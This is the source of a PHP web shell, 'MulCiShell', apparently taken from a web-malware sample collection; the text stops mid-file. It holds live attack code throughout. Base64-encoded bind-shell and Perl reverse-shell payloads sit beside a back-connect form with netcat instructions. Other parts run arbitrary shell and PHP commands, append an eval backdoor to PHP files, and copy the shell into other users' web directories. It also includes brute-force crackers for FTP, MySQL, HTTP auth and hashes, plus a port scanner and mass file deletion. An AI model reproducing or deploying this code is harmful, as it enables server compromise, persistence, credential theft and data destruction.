webshell/web-malware-collection-13-06-2012/PHP/shellzx.txt
2013-06-05 12:08:30 +08:00

1461 lines
No EOL
69 KiB
Text

<?php
#/\/\/\/\/\ MulCiShell v0.2 - Edited By KingDefacer/\/\/\/\/\/\/\#
# Updates from version 1.0#
# 1) Fixed MySQL insert function
# 2) Fixed trailing dirs
# 3) Fixed file-editing when set to 777
# 4) Removed mail function (who needs it?)
# 5) Re-wrote & improved interface
# 6) Added actions to entire directories
# 7) Added config+forum finder
# 8) Added MySQL dump function
# 9) Added DB+table creation, DB drop, table delete, and column+table count
# 10) Updated security-info feature to include more useful details
# 11) _Greatly_ Improved file browsing and handling
# 12) Added banner
# 13) Added DB-Parser and locator
# 14) Added enumeration function
# 15) Added common functions for bypassing security restrictions
# 16) Added bindshell & backconnect (needs testing)
# 17) Improved command execution (alts)
#/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/#
@ini_set("memory_limit","256M");
@set_magic_quotes_runtime(0);
session_start();
ob_start();
$start=microtime();
if(isset($_GET['theme'])) $_SESSION['theme']=$_GET['theme'];
//Thanks korupt ;)
$backdoor_c="DQojaW5jbHVkZSA8YXNtL2lvY3Rscy5oPg0KI2luY2x1ZGUgPHN5cy90aW1lLmg+DQojaW5jbHVkZSA8c3lzL3NlbGVjdC5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxuZXRpbmV0L2luLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPHN0ZGludC5oPg0KI2luY2x1ZGUgPHB0aHJlYWQuaD4NCg0Kdm9pZCAqQ2xpZW50SGFuZGxlcih2b2lkICpjbGllbnQpDQp7DQoJaW50IGZkID0gKGludCljbGllbnQ7DQoJZHVwMihmZCwgMCk7DQoJZHVwMihmZCwgMSk7DQoJZHVwMihmZCwgMik7DQoJaWYoZm9yaygpID09IDApDQoJCWV4ZWNsKCIvYmluL2Jhc2giLCAicmVzbW9uIiwgMCk7DQoJY2xvc2UoZmQpOw0KCXJldHVybiAwOw0KfQ0KDQppbnQgbWFpbihpbnQgYXJnYywgY2hhciAqYXJndltdKQ0Kew0KCWludCBtc29jaywgY3NvY2ssIGkgPSAxOw0KCXB0aHJlYWRfdCB0aHJlYWQ7DQoJc3RydWN0IHNvY2thZGRyIHNhZGRyOw0KCXN0cnVjdCBzb2NrYWRkcl9pbiBzYWRkckluOw0KICAgIGludCBwb3J0PWF0b2koYXJndlsxXSk7DQoJaWYoKG1zb2NrID0gc29ja2V0KEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBJUFBST1RPX1RDUCkpID09IC0xKQ0KCQlyZXR1cm4gLTE7DQoNCglzYWRkckluLnNpbl9mYW1pbHkJCT0gQUZfSU5FVDsNCglzYWRkckluLnNpbl9hZGRyLnNfYWRkcgk9IElOQUREUl9BTlk7DQoJc2FkZHJJbi5zaW5fcG9ydAkJPSBodG9ucyhwb3J0KTsNCiAgIA0KCW1lbWNweSgmc2FkZHIsICZzYWRkckluLCBzaXplb2Yoc3RydWN0IHNvY2thZGRyX2luKSk7DQoJc2V0c29ja29wdChtc29jaywgU09MX1NPQ0tFVCwgU09fUkVVU0VBRERSLCAoY2hhciAqKSZpLCBzaXplb2YoaSkpOw0KIA0KCWlmKGJpbmQobXNvY2ssICZzYWRkciwgc2l6ZW9mKHNhZGRyKSkgIT0gMCl7DQoJCWNsb3NlKG1zb2NrKTsNCgkJcmV0dXJuIC0xOw0KCX0NCiANCglpZihsaXN0ZW4obXNvY2ssIDEwKSA9PSAtMSl7DQoJCWNsb3NlKG1zb2NrKTsNCgkJcmV0dXJuIC0xOw0KCX0NCiANCgl3aGlsZSgxKXsNCgkJaWYoKGNzb2NrID0gYWNjZXB0KG1zb2NrLCBOVUxMLCBOVUxMKSkgIT0gLTEpew0KCQkJcHRocmVhZF9jcmVhdGUoJnRocmVhZCwgMCwgaGFuZGxlciwgKHZvaWQgKiljc29jayk7DQoJCX0NCgl9DQoJDQoJcmV0dXJuIDE7DQp9";
$backconnect_perl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KbXkgKCRpYWRkciwkcG9ydCwkY21kKT1AQVJHVjsNCm15ICRwYWRkcj1zb2NrYWRkcl9pbigkcG9ydCwgaW5ldF9hdG9uKCRpYWRkcikpOw0KbXkgJHByb3RvID0gZ2V0cHJvdG9ieW5hbWUoInRjcCIpOw0Kc29ja2V0KFNPQ0tFVCwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90byk7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKTsNCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOw0Kb3BlbihTVERJTiwiPiZTT0NLRVQiKTsNCnByaW50IFNPQ0tFVCAiU2hlbGwgdGVzdFxuIjsNCnByaW50IGV4ZWMoJGNtZCk7DQpjbG9zZShTVERJTik7DQpjbG9zZShTVERPVVQpOw0K";
$pl_scan="DQoJIyEvdXNyL2Jpbi9wZXJsDQp1c2Ugd2FybmluZ3M7DQp1c2Ugc3RyaWN0Ow0KdXNlIGRpYWdub3N0aWNzOw0KdXNlIElPOjpTb2NrZXQ6OklORVQ7DQpzdWIgdXNhZ2UNCnsNCglkaWUoIiQwIGhvc3Qgc3RhcnRwb3J0IGVuZHBvcnQKIik7DQp9DQp1c2FnZSB1bmxlc3MoQEFSR1Y+MSk7DQpteSgkaG9zdCwkcywkZSk9QEFSR1Y7DQpmb3JlYWNoKCRzLi4kZSkNCnsNCglteSAkc29jaz1JTzo6U29ja2V0OjpJTkVULT5uZXcNCgkoDQoJCVBlZXJBZGRyPT4kaG9zdCwNCgkJUGVlclBvcnQ9PiRfLA0KCQlQcm90bz0+J3RjcCcsDQoJCVRpbWVvdXQ9PjINCgkpOw0KCXByaW50ICJQb3J0ICBvcGVuCiIgaWYgKCRcc29jayk7DQp9DQoNCgk=";
$access_control=0;
$md5_user="KingDefacer";
$md5_pass="123";
$user_agent="KingDefacer";
$allowed_addrs=array('127.0.0.1');
$shell_email="KingDefacer@msn.com";
$self=basename($_SERVER['PHP_SELF']);
$addr=$_SERVER['REMOTE_ADDR'];
$serv=@gethostbyname($_SERVER['HTTP_HOST']);
$soft=$_SERVER['SERVER_SOFTWARE'];
$safe_mode=(@ini_get("safe_mode")=='')?"OFF":"ON";
$open_basedir=(@ini_get("open_basedir")=='')?"OFF":"ON";
$uname=@php_uname();
$space=TrueSize(disk_free_space(realpath(getcwd())));
$total=TrueSize(disk_total_space(realpath(getcwd())));
$id=@execmd("id",$disable);
$int_paths=array("mybb","phpbb","phpbb3","forum","forums","board","boards","bb","discuss");
$inc_paths=array("includes","include","inc");
$sql_build_path;
echo "<script type=\"text/javascript\" language=\"javascript\">
function togglecheck()
{
var cb=document.forms[0].check
for (i in cb)
{
cb[i].checked=(cb[i].checked)?false:true;
}
}
</script>";
switch($access_control) #Break statements intentionally ommited
{
case 3:
$ip_allwd=false;
foreach($allowed_addrs as $addr)
{
if($addr==$_SERVER['REMOTE_ADDR']) {$ip_allwd=true; break;}
if(!$ip_allwd) exit;
}
case 2:
if(!isset($_SERVER['PHP_AUTH_USER'])||$_SERVER['PHP_AUTH_USER']!=$md5_user||$_SERVER['PHP_AUTH_PW']!=$md5_pass)
{
header("WWW-Authenticate: Basic Realm=\"Restricted area\"");
header("HTTP/1.1 401 Unauthorized");
echo "Wrong username/password";
exit;
}
case 1:
if($_SERVER['HTTP_USER_AGENT']!=$user_agent) exit;
}
if($id)
{
$s=strpos($id,"(",0)+1;
$e=strpos($id,")",$s);
$idval=substr($id,$s,$e-$s);
}
$disable=@ini_get("disable_functions");
if(empty($disable)) $disable="None";
function rm_rep($dir,&$success,&$fail)
{
@$dh=opendir($dir);
if(is_resource($dh))
{
while((@$rm=readdir($dh)))
{
if($rm=='.' || $rm=='..') continue;
if(is_dir($dir.'/'.$rm)) {echo "Deleting dir $dir/$rm...</br>"; rm_rep($dir.'/'.$rm,$success,$fail); continue;}
if(@unlink($dir.'/'.$rm)) {$success++;echo "Deleted $rm...</br>";}
else {$fail++; echo "Failed to delete $rm</br>";}
}
@closedir($dh);
} else echo "Failed to open dir $dir</br>";
}
function chmod_rep($dir,&$success,&$fail,$mod_value)
{
@$dh=opendir($dir);
if(is_resource($dh))
{
while((@$ch=readdir($dh)))
{
if($ch=='.' || $ch=='..') continue;
if(is_dir($dir.'/'.$ch)) {echo "Changing file modes in dir $dir/$ch...</br>"; chmod_rep($dir.'/'.$ch,$success,$fail,$mod_value); continue;}
if(@chmod($dir.'/'.$ch,$mod_value)) {$success++;echo "Changed mode for $ch...</br>";}
else {$fail++; echo "Failed to chmod $rm</br>";}
}
@closedir($dh);
} else echo "Failed to open dir $dir</br>";
}
#Complete these functions
function spread_self($user,&$c=0,$d=0)
{
if(!$d) $dir="/home/$user/public_html/";
else $dir=$d;
if(is_dir($dir)&&is_writable($dir))
{
copy(CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF']),$dir.$f.'/mshell.php');
echo "[+] Shell copied to $dir.$f./mshell.php</br>";
$c++;
}
if(@$dh=opendir($dir)) echo "[-] Failed to open dir $dir</br>";
while((@$f=readdir($dh)))
{
if($f!="."&&$f!="..")
{
if(@is_dir($dir.$f))
{
echo "[+] Spreading to dir $dir</br>";
if(@is_writable($dir.$f))
{
copy(CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF']),$dir.$f.'/mshell.php');
echo "[+] Shell copied to $dir.$f./mshell.php</br>";
$c++;
}
$c+=spread_self($user,$c,$dir.$f.'/');
}
}
}
}
function copy_rep($dir,&$c)
{
}
function backup_site()
{
if(!isset($_POST['busite']))
{
echo "<center>The following tool will attempt to retrieve every file from the specified dir (including child dirs).</br>If successful, you will be prompted for a site backup download.</br><i>Note: Only readable files will be downloaded. Images and executables will be discarded. This tool should only be used in scenarios in which you have to quickly retrieve a site's source.</i></center>";
}
}
function infect_rep($dir,&$success,&$fail)
{
}
function copy_dir($dir,$new_dir)
{
}
##################################
function execmd($cmd,$d_functions="None")
{
if($d_functions=="None") {$ret=passthru($cmd); return $ret;}
$funcs=array("shell_exec","exec","passthru","system","popen","proc_open");
$d_functions=str_replace(" ","",$d_functions);
$dis_funcs=explode(",",$d_functions);
foreach($funcs as $safe)
{
if(!in_array($safe,$dis_funcs))
{
if($safe=="exec")
{
$ret=@exec($cmd);
$ret=join("\n",$ret);
return $ret;
}
elseif($safe=="system")
{
$ret=@system($cmd);
return $ret;
}
elseif($safe=="passthru")
{
$ret=@passthru($cmd);
return $ret;
}
elseif($safe=="shell_exec")
{
$ret=@shell_exec($cmd);
return $ret;
}
elseif($safe=="popen")
{
$ret=@popen("$cmd",'r');
if(is_resource($ret))
{
while(@!feof($ret))
$read.=@fgets($ret);
@pclose($ret);
return $read;
}
return -1;
}
elseif($safe="proc_open")
{
$cmdpipe=array(
0=>array('pipe','r'),
1=>array('pipe','w')
);
$resource=@proc_open($cmd,$cmdpipe,$pipes);
if(@is_resource($resource))
{
while(@!feof($pipes[1]))
$ret.=@fgets($pipes[1]);
@fclose($pipes[1]);
@proc_close($resource);
return $ret;
}
return -1;
}
}
}
return -1;
}
$links=array("Enumerate"=>"$self?act=enum","Files"=>"$self?act=files","Domains"=>"$self?act=domains","MySQL"=>"$self?act=sql","Encoder"=>"$self?act=encode",
"Sec. Info"=>"$self?act=sec","Cracker"=>"$self?act=bf",
"Bypassers"=>"$self?act=bypass","Tools"=>"$self?act=tools","Databases"=>"$self?act=dbs","Backdoor Host"=>"$self?act=bh","Back Connect"=>"$self?act=backc","Spread Shell"=>"$self?act=spread","Kill Shell"=>"$self?act=kill");
echo "<html><head><title>MulCiShell v2.0 - Edited By KingDefacer</title></head>";
switch($_SESSION['theme'])
{
case 'green':
echo "<style>
body{color:#66FF00; font-size: 12px; font-family: serif; background-color: black;}
td {border: 1px solid #00FF00; background-color:#001f00; padding: 2px; font-size: 12px; color: #33FF00;}
td:hover{background-color: black; color: #33FF00;}
input{background-color: black; color: #00FF00; border: 1px solid green;}
input:hover{background-color: #006600;}
textarea{background-color: black; color: #00FF00; border: 1px solid white;}
a {text-decoration: none; color: #66FF00; font-weight: bold;}
a:hover {color: #00FF00;}
select{background-color: black; color: #00FF00;}
#main{border-bottom: 1px solid #33FF00; padding: 5px; text-align: center;}
#main a{padding-right: 15px; color:#00CC00; font-size: 12px; font-family: arial; text-decoration: none; }
#main a:hover{color: #00FF00; text-decoration: underline;}
#bar{width: 100%; position: fixed; background-color: black; bottom: 0; font-size: 10px; left: 0; border-top: 1px solid #FFFFFF; height: 12px; padding: 5px;}
</style>
<body>";
break;
case 'dark':
echo "<style>
body{color: #FFFFFF; font-size: 12px; font-family: serif; background-color: #000000;}
td {border: 1px solid #FFFFFF; background-color: #000000; padding: 2px; font-size: 12px; color: #FFFFFF;}
input{background-color: black; color: #FFFFFF;; border: 1px solid #FFFFFF;}
input:hover{background-color: #000099;}
textarea{background-color: #000000; color: #FFFFFF; border: 1px solid white;}
a {text-decoration: none; color: #FFFFFF; font-weight: bold;}
a:hover {font-weight: bold;}
select{background-color: #000000; color: #FFFFFF;}
#main{border-bottom: 1px solid white; padding: 5px; text-align: center;}
#main a{padding-right: 15px; color:#FFFFFF; font-size: 12px; font-family: arial; text-decoration: none; }
#main a:hover{font-weight: bold;}
#bar{width: 100%; position: fixed; background-color: black; bottom: 0; font-size: 10px; left: 0; border-top: 1px solid #FFFFFF; height: 12px; padding: 5px;}
</style><body>";
break;
default:
echo "<style>
body{color: white; font-size: 12px; font-family: arial; scrollbar-base-color:blue; scrollbar-arrow-color:yellow; scrollbar-face-color:blue; }
td {border: 1px solid #000099; background-color: #000033; padding: 2px; font-size: 12px; color: white; }
input{background-color: black; color: white; border: 1px solid #000066;}
input:hover{background-color: #000066; border: 1px solid white;}
td:hover {color: yellow; background: black;}
textarea{background-color: #000033; color: white; border: 1px solid white;}
a {text-decoration: none; color: white; font-weight: bold;}
a:hover {color: yellow}
select{background-color: black; color: white;}
#main{border-bottom: 1px solid #0066FF; padding: 5px; text-align: center;}
#main a{padding-right: 15px; color: white; font-size: 12px; font-family: arial; text-decoration: none; }
#main a:hover{color: #0033FF; text-decoration: underline;}
#bar{width: 100%; position: fixed; background-color: black; bottom: 0; font-size: 10px; left: 0; border-top: 1px solid #FFFFFF; height: 12px; padding: 5px;}
</style>
<body bgcolor='black'>";
break;
}
echo base64_decode("PGNlbnRlcjxpbWcgc3JjPSdodHRwOi8vaW1nNTI5LmltYWdlc2hhY2sudXMvaW1nNTI5LzExNjYv
bWlsY2lzaGVsbGxrNi5wbmcnPjwvY2VudGVyPg==");
echo "<table style='width: inherit; margin: auto; text-align: center;'>
<tr><td>Server IP</td><td>Your IP</td><td>Disk space</td><td>Safe_mode?</td><td>Open_BaseDir?</td><td>System</td><td>Server software</td><td>Disabled functions</td><td>ID</td><td>Shell location</td></tr>
<tr><td>$serv</td><td>$addr</td><td>$space of $total</td><td>$safe_mode</td><td>$open_basedir</td><td>$uname</td><td>$soft</td><td>$disable</td><td>$idval</td><td>".CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF'])."</td></tr>
</table></br>
<div id='main'>";
foreach($links as $val=>$addr) echo "<a href='$addr'>[ $val ]</a>";
echo "</div><br>";
if(isset($_POST['encryption']))
{
$e=$_POST['encrypt'];
echo "<form action='$self?' method='post'><center><textarea rows='19' cols='75' readonly>MD5: ".md5($e)."\nSHA1: ".sha1($e)."\nCrypt: ".crypt($e)."\nCRC32: ".crc32($e)."\nBase64 Encoded: ".base64_encode($e)."\nBase64 decoded: ".base64_decode($e)."\nURL encode: ".urlencode($e)."\nURL decode: ".urldecode($e)."\nBin2Hex ".bin2hex($e)."\nDec2Hex: ".dechex($e)."</textarea><br><br>Input: <input type='text' style='width: 300px' name='encrypt'>
<br><input type='submit' value='Encrypt' name='encryption'></center>";
}
if(isset($_POST['dogetfile']))
execmd("wget $_POST[wgetfile]",$disable);
if(isset($_POST['doUpload']))
{
$dir=$_POST['u_location'];
$name=$_FILES['u_file']['name'];
switch($_FILES['u_file']['error'])
{
case 0:
if(@move_uploaded_file($_FILES['u_file']['tmp_name'],$dir.'/'.$name))
echo "File uploaded successfully<br>";
else echo "Failed to upload file!";
}
}
if(isset($_POST['massfiles']))
{
$fail=0;
$success=0;
switch($_POST['fileaction'])
{
case 'Infect': #Nothing special here, just kick them while they're down
foreach($_POST['files'] as $file)
{
$ext=strrchr($file,'.');
if($ext!=".php") continue;
@$fh=fopen($file,'a');
if(@is_resource($fh))
{
$success++;
@fwrite($fh,"<?php @eval(\$_GET['e']) ?>");
@fclose($fh);
} else $fail++;
}
echo "Successfully infected $success files; failed to infect $fail files</br>Exploit files as such: file.php?e=php code";
break;
case 'Delete':
foreach($_POST['files'] as $file)
{
if(is_dir($file)) rm_rep($file,$success,$fail);
else
{
if(@unlink(CleanDir($file)))
{
echo "File $file deleted<br>";
$success++;
}
else
{
echo "Failed to delete file $file<br>";
$fail++;
}
}
}
echo "Total files deleted: $success; failed to delete $fail files<br>";
break;
case 'Chmod':
foreach($_POST['files'] as $file)
{
if(is_dir($file)) chmod_rep($file,$success,$fail,$_POST['cmodv']);
if(@chmod(CleanDir($file),$_POST['cmodv']))
{
echo "Changed mode for $file<br>";
$success++;
}
else
{
echo "Failed to change mode for $file<br>";
$fail++;
}
}
echo "Total files modes modified: $success; failed to chmod $fail files<br>";
break;
}
}
if(isset($_POST['docrack']))
{
$con=true;
$show=0;
$list=@fopen($_FILES['wordlist']['tmp_name'],'r');
if(is_resource($list))
{
if(isset($_POST['ftpcrack']))
{
echo "Bruting $_POST[ftp_user]@$_POST[ftp_host]...</br>";
if(!empty($_POST['ftp_port'])) $port=$_POST['ftp_port'];
else $port='3306';
if(empty($_POST['ftp_timeout'])||!preg_match("/^[0-9]$/",$_POST['ftp_timeout']))
$time=3;
else $time=$_POST['ftp_timeout'];
@$ftp=ftp_connect($_POST['ftp_host'],$port,$time);
if(!$ftp) $con=false;
if($con)
{
$show++;
while(!feof($list))
{
@$pass=fgets($list);
if(ftp_login($ftp,$_POST['ftp_user'],trim($pass)))
{
echo "Password found! Password for $_POST[ftp_user] is $pass<br>";
@ftp_close($ftp);
break;
}
if($show==10000){echo "Trying pass $pass...</br>"; $show=0;}
}
} else echo "Failed to connect!</br>";
}
elseif(isset($_POST['remote_login']))
{
//if(!function_exists("jitghjytiojho")) die("cURL support has to be enabled.");
/*
$ch=curl_init($_POST['remote_login_target']);
curl_setopt($ch,CURLOPT_HEADER,0);
curl_setopt($ch,CURLOPT_POST,1);
curl_setopt($ch,CURLOPT_POSTFIELDS,'');
curl_exec($ch);
*/
if(preg_match("/^http:\/\/+/",$_POST['remote_login_target'])) die("Do not include http:// in the target URL.");
$path=explode('/',$_POST['remote_login_target']);
$site=$path[0];
for($i=1;$i<count($path);$i++) $full_path.='/'.$path[$i];
}
elseif(isset($_POST['vbcrack']))
{
if(empty($_POST['vbhash']) OR empty($_POST['vbsalt'])) die("Please specify a hash and salt");
while(!feof($list))
{
$show++;
$pass=trim(fgets($list));
$vbenc=md5(md5($pass).$_POST['vbsalt']);
if($vbenc===$_POST['vbhash'])
{
echo "Password for $_POST[vbhash] found! is $pass</br>";
break;
}
if($show===10000)
{
$show=0;
echo "Trying pass $pass...</br>";
}
}
echo "Complete</br>";
}
elseif(isset($_POST['mysqlcrack']))
{
$host=$_POST['mysql_host'];
$user=$_POST['mysql_user'];
if(!empty($_POST['mysql_port'])) $host.=":$_POST[mysql_port]";
while(!feof($list))
{
$show++;
$pass=trim(fgets($list));
if(@mysql_connect($host,$user,$pass))
{
echo "Password found! Password for $user is $pass</br>";
break;
}
if($show==10000)
{
echo "Trying $pass...</br>";
$show=0;
continue;
}
}
}
elseif(isset($_POST['authcrack']))
{
$arr=explode('/',$_POST['auth_url']);
$con_url=$arr[0];
if(empty($_POST['auth_url'])) die("Enter a target first...");
for($i=1;$i<count($arr);$i++) $path.='/'.$arr[$i];
if(preg_match("/^http:\/\/+/",$_POST['auth_url'])) die("Do not include http:// in the url");
while(!feof($list))
{
if(is_resource($conn_url=fsockopen($con_url,80,$errno,$errstr,5)))
{
$show++;
$pass=trim(fgets($list));
if($show>5000) {$show=0; echo $pass;}
$encode=base64_encode(trim($_POST['auth_user']).':'.$pass);
$header="GET $path HTTP/1.1\r\n";
$header.="Host: $con_url\r\n";
$header.="Authorization: Basic $encode\r\n";
$header.="Connection: Close\r\n\r\n";
fputs($conn_url,$header,strlen($header));
$tmp++;
while(!feof($conn_url))
{
$tmp=fgets($conn_url);
if(preg_match("/HTTP\/\d+\.\d+ 200+/",$tmp))
{
echo "Password found! Password=$pass</br></br>";
break 2;
}
}
}
}
echo "Done</br>";
}
elseif(isset($_POST['md5crack']))
{
if(empty($_POST['md5hash'])) die("Enter a hash before attempting to crack one ;)");
$md5=trim($_POST['md5hash']);
while(!feof($list))
{
$show++;
$pass=trim(fgets($list));
if(md5($pass)===$md5)
{
echo "Password found! Plaintext for $md5 is $pass</br>";
break;
}
if($show==10000)
{
echo "Trying $pass...</br>";
$show=0;
continue;
}
}
}
elseif(isset($_POST['sha1crack']))
{
if(empty($_POST['sha1hash'])) die("Enter a hash before attempting to crack one ;)");
$sha1=trim($_POST['sha1hash']);
while(!feof($list))
{
$show++;
$pass=trim(fgets($list));
if(sha1($pass)===$sha1)
{
echo "Password found! Plaintext for $sha1 is $pass</br>";
break;
}
if($show==10000)
{
echo "Trying $pass...</br>";
$show=0;
continue;
}
}
}
}
@fclose($list);
}
if(isset($_POST['port_scan']))
{
switch($_POST['type'])
{
case 'php':
extract($_POST);
while($sport<=$eport)
{
echo "Trying port $sport";
if(@fsockopen($host,$sport,$errno,$errstr,2)) echo "Port $sport open</br>";
$sport++;
}
break;
default:
echo "Invalid request</br>";
}
}
if(isset($_POST['find_forums']))
{
echo "<center><b>[ Forum locator ]</b></center></br></br>";
$found=0;
global $int_paths;
@$fp=fopen($_POST['passwd'],'r') or die("Failed to open passwd file!");
while(!feof($fp))
{
@list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($fp));
$path="/home/$user/public_html";
if(@is_dir($path))
{
foreach($int_paths as $forum_path)
{
$full_path=$path."/$forum_path/";
if(@is_dir($full_path))
{
echo "[+] Forum found: Path: $full_path</br>";
$found++;
continue;
}
}
}
}
echo "Scan complete. Found $found forums</br></br>";
}
function find_configs($path,&$found)
{
if(@file_exists($path.'config.php'))
{
echo "Found config file: $path"."config.php</br>";
$found++;
}
@$dh=opendir($path);
while((@$file=readdir($dh)))
if(is_dir($file)&&$file!='.'&&$file!='..') find_configs($path.$file.'/',$found);
@closedir($dh);
}
if(isset($_POST['find_configs']))
{
$found=0;
echo "<center><b>[ Config locator ]</b></center></br></br>";
@$fp=fopen($_POST['passwd'],'r') or die("Failed to open passwd file!");
while(!feof($fp))
{
@list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($fp));
$path="/home/$user/public_html/";
find_configs($path,$found);
}
@fclose($fp);
echo "Scan complete. Found $found configs</br></br>";
}
if(isset($_POST['execmd']))
{echo "<center><textarea rows='10' cols='100'>";
echo execmd($_POST['cmd'],$disable);
echo "</textarea></center>";}
if(isset($_POST['execphp']))
{echo "<center><textarea rows='10' cols='100'>";
echo eval(stripslashes($_POST['phpcode']));
echo "</textarea></center>";}
if(isset($_POST['cnewfile']))
{
if(@fopen($_POST['newfile'],'w')) echo "File created<br>";
else echo "Failed to create file<br>";
}
if(isset($_POST['cnewdir']))
{
if(@mkdir($_POST['newdir'])) echo "Directory created<br>";
else echo "Failed to create directory<br>";
}
if(isset($_POST['doeditfile'])) FileEditor();
switch($_GET['act'])
{
case 'backc':
if(!isset($_POST['backconnip']))
{
echo "<center><form action='$self?act=backc' method='post'>
Address: <input type='text' value='$_SERVER[REMOTE_ADDR]' name='backconnip'>
Port: <input type='text' value='1337' name='backconnport'>
<input type='submit' value='Connect'></br></br>
Listen with netcat by executing 'nc -l -n -v -p 1337'</br></br>
<b>Note: Be sure to foward your port first</b>
</form></center>";
} else {
if(empty($_POST['backconnport'])||empty($_POST['backconnip'])) die("Specify a host/port");
if(is_writable("."))
{
@$fh=fopen(getcwd()."/bc.pl",'w');
@fwrite($fh,base64_decode($backconnect_perl));
@fclose($fh);
echo "Attempting to connect...</br>";
execmd("perl ".getcwd()."/bc.pl $_POST[backconnip] $_POST[backconnport]",$disable);
if(!@unlink(getcwd()."/bc.pl")) echo "<font color='#FF0000'>Warning: Failed to delete reverse-connection program</font></br>";
} else {
@$fh=fopen("/tmp/bc.pl","w");
@fwrite($fh,base64_decode($backconnect_perl));
@fclose($fh);
echo "Attempting to connect...</br>";
if(!@unlink("/tmp/bc.pl")) echo "<font color='#FF0000'><h2>Warning: Failed to delete reverse-connection program<</h2>/font></br>";
}
}
break;
case 'dbs': database_tools(); break;
case 'sql': SQLLogin(); break;
case 'sqledit': SQLEditor(); break;
case 'download': SQLDownload(); break;
case 'tools': show_tools(); break;
case 'logout': $_SESSION=array(); session_destroy(); echo "Logged out from MySQL.<br>"; break;
case 'f': FileEditor(); break;
case 'encode':Encoder(); break;
case 'bypass':security_bypass(); break;
case 'bf':brute_force(); break;
case 'bh': BackDoor(); break;
case 'spread':
if(!isset($_POST['spread_shell']))
{
echo "<center><form action='?act=spread' method='post'>
This tool will attempt to copy the shell into every writable directory on the server, in order to allow access maintaining.</br>
Passwd file: <input type='text' value='/etc/passwd' name='passwd_file'></br>
<input type='submit' value='Spread' name='spread_shell'>
</form></center>";
} else {
$s=0;
@$file=fopen($_POST['passwd_file'],'r');
if(is_resource($file))
{
while(!feof($file))
{
@list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($file));
spread_self($user,$s);
}
@fclose($file);
}
echo ($s>0)?"Spread complete. Successfully managed to spread the shell $s times</br>":"Failed to spread the shell.</br>";
}
break;
case 'domains':
$header="GET /search/reverse-ip-domain.php?q=$_SERVER[HTTP_HOST] HTTP/1.0\r\n";
$header.="Host: searchy.protecus.de\r\n";
$header.="Connection: Close\r\n\r\n";
$domain_handle=fsockopen("searchy.protecus.de",80);
@fputs($domain_handle,$header,strlen($header));
while(@!feof($domain_handle))
{
echo fgets($domain_handle);
}
break;
case 'kill':
if(!isset($_POST['justkill']))
{
echo "<center>Do you *really* want to kill the shell?<br><br><form action='$self?act=kill' method='post'>
<input type='submit' value='Yes' name='justkill'></center>";
} else {
if(@unlink(basename($_SERVER['PHP_SELF']))) echo "Shell deleted.<br>";
else echo "Failed to delete shell<br>";
}
break;
case 'sec':
$mysql_on=function_exists("mysql_connect")?"ON":"OFF";
$curl_on=function_exists("curl_init")?"ON":"OFF";
$magic_quotes_on=get_magic_quotes_gpc()?"ON":"OFF";
$register_globals_on=(@ini_get('register_globals')=='')?"OFF":"ON";
$include_on=(@ini_get('allow_url_include')=='')?"Disabled":"Enabled";
$etc_passwd=@is_readable("/etc/passwd")?"Yes":"No";
$ver=phpversion();
echo "<center>Security overview</center><table style='margin: auto;'><tr><td>PHP Version</td><td>Safe mode</td><td>Open_Basedir</td><td>Magic_Quotes</td><td>Register globals</td><td>
Remote includes</td><td>Read /etc/passwd?</td><td>MySQL</td><td>cURL</td></tr>
<tr><td>$ver</td><td>$safe_mode</td><td>$open_basedir</td><td>$magic_quotes_on</td><td>$register_globals_on</td><td>$include_on</td>
<td>$etc_passwd</td><td>$mysql_on</td><td>$curl_on</td>
</tr>";
"</table>";
break;
case 'enum':
$windows=0;
$path=CleanDir(getcwd());
if(!eregi("Linux",php_uname())) {$windows=1;}
if(!$windows)
{
$spath=str_replace("/home/","$serv/~",$path);
$spath=str_replace("/public_html/","/",$spath);
$URL="http://$spath/".basename($_SERVER['PHP_SELF']);
echo "Enumerated shell link: <a href='$URL'>$URL</a>";
} else echo "Enumeration failed<br>";
break;
}
echo "<br>";
if(isset($_POST['sqlquery']))
{
extract($_SESSION);
$conn=@mysql_connect($mhost.":".$mport,$muser,$mpass);
if($conn)
{
if(isset($_POST['db'])) @mysql_select_db($_POST['db']);
$post_query=@mysql_query(stripslashes($_POST['sqlquery'])) or die(mysql_error());
$affected=@mysql_num_rows($post_query);
echo "Affected rows: $affected<br>";
}
}
$dirs=array();
$files=array();
if(!isset($_GET['d'])) {$d=CleanDir(realpath(getcwd())); $dh=@opendir(".") or die("Permission denied!");}
else {$d=CleanDir($_GET['d']); $dh=@opendir($_GET['d']) or die("Permission denied!");}
$current=explode("/",$d);
echo "<table style='width: 100%; text-align: center;'><tr><td>Current location: ";for($p=0;$p<count($current);$p++)
for($p=0;$p<count($current);$p++)
{
$cPath.=$current[$p].'/';
echo "<a href=$self?d=$cPath>$current[$p]</a>/";
}
echo "</td></tr></table>";
if(isset($_GET['d'])) echo "<form action='$self?d=$_GET[d]' method='post'>";
else echo "<form action='$self?' method='post'>";
echo "<table style='width: 100%'>
<tr><td>File</td><td>Size</td><td>Owner/group</td><td>Perms</td><td>Writable</td><td>Modified</td><td>Action</td></tr>";
while(($f=@readdir($dh)))
{
if(@is_dir($d.'/'.$f)) $dirs[]=$f;
else $files[]=$f;
}
asort($dirs);
asort($files);
@closedir($dh);
foreach($dirs as $f)
{
@$own=function_exists("posix_getpwuid")?posix_getpwuid(fileowner($d.'/'.$f)):fileowner($d.'/'.$f);
